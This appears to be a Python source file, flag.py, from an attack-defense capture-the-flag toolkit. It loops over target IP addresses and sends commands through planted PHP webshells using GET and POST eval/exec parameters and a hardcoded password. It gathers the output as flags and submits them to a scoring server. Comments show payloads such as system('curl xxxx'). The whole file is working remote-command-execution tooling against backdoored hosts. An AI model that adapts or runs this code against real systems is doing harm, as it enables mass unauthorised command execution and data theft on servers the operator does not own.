-
Notifications
You must be signed in to change notification settings - Fork 87
/
Copy pathflag.py
147 lines (127 loc) · 4.35 KB
/
flag.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
# -*- coding: utf-8 -*-
import requests
from core.shells import *
import re
#from core.ip_list import *
#GET_eval_shells_path_pwd = {}
#POST_eval_shells_path_pwd = {}
#GET_exec_shells_path_pwd = {}
#POST_exec_shells_path_pwd = {}
flags = []
cookies = ''
datas = ''
url = ''
command = ''
# Example:POST_data={'x':"system('curl xxxx');"}
# POST_file = "system('curl xxxx');"
# Example:GET_data="echo exec('curl xxxx');"
#eval_file = "echo exec('curl xxxx');"
#exec_file = "curl xxxx"
#global GET_eval_shells_path_pwd,POST_eval_shells_path_pwd,GET_exec_shells_path_pwd,POST_exec_shells_path_pwd
# 设置获取flag的命令
def set_command(command):
cmd = "'" + command + "'"
global POST_file,eval_file,exec_file
eval_file = """system(%s);""" % cmd
print eval_file
# eval_file="echo exec(%s);"%cmd
exec_file = command
# 判断获取flag是否成功
def judege(url,flag):
global flags
text=flag.text
if flag.status_code == 200 and str(text)!='':
flags.append(flag.text)
#target.write(flag.text)
print url+ " got flag!"
else:
print url + " got flag failed!"
# 遍历ip列表获取flag
def get_flag():
#global GET_eval_shells_path_pwd,POST_eval_shells_path_pwd,GET_exec_shells_path_pwd,POST_exec_shells_path_pwd
GET_eval_shells_path_pwd=Get_GET_eval_sap()
POST_eval_shells_path_pwd=Get_Post_eval_sap()
GET_exec_shells_path_pwd=Get_GET_exec_sap()
POST_exec_shells_path_pwd=Get_POST_exec_sap()
print GET_eval_shells_path_pwd,POST_eval_shells_path_pwd,GET_exec_shells_path_pwd,POST_exec_shells_path_pwd
global ipList
print 'this'
#global target
#target = open('auxi/flags.txt','w')
for i in ipList:
for j in POST_eval_shells_path_pwd:
eval_POST_data={}
eval_POST_data['pass']='Sn3rtf4ck'
eval_POST_data[POST_eval_shells_path_pwd[j]] =eval_file
url = "http://" + i + j
try:
flag = requests.post(url,data = eval_POST_data,timeout=3)
judege(url,flag)
except:
print "error!"
for k in GET_eval_shells_path_pwd:
url = "http://" + i + k
print url
try:
if '?' in k:
flag = requests.get(url + '&' + GET_eval_shells_path_pwd[k] + "=" + eval_file)
else:
payload = {GET_eval_shells_path_pwd[k]:eval_file}
flag = requests.get(url,params = payload,timeout=3)
judege(url,flag)
except:
print "error"
for m in GET_exec_shells_path_pwd:
url = "http://" + i + m
try:
payload = {GET_exec_shells_path_pwd[m]:exec_file}
flag = requests.get(url,params = payload,timeout=3)
judege(url,flag)
except:
print "error"
for n in POST_exec_shells_path_pwd:
url = "http://" + i + n
exec_POST_data = {POST_exec_shells_path_pwd[n]:exec_file}
try:
flag = requests.post(url,data = exec_POST_data,timeout=3)
judege(url,flag)
except:
print "error"
#target.close()
def show_flag():
for i in flags:
print i
# 提交flag
def submit_flag(url = url,cookies = cookies,datas = datas):
global flags
cookie = cookies.replace(' ','')
cookie_dict = dict((line.split('=') for line in cookie.strip().split(";")))
data = datas.replace(' ','')
data_dict = dict((line.split('=') for line in data.strip().split("&")))
check = "<Response [200]>"
for j in data_dict:
if data_dict[j] == '?':
p = j
for i in flags:
pattern = re.compile(r'flag{\w+?}')
flag=pattern.search(i)
data_dict[p] = flag
print i
try:
a = requests.post(url,data = data_dict,cookies = cookie_dict)
if a.status_code==200:
print "Submit flag success"
else:
print "submit flag failed"
except:
print "something is wrong ,please check!"
print "ok,do you want to clear flag?",
choice = raw_input("y/n")
while choice not in ['y','n']:
print "please input 'y/n'"
choice = raw_input("y/n")
if choice == 'y':
clear_flag()
def clear_flag():
global flags
flags = []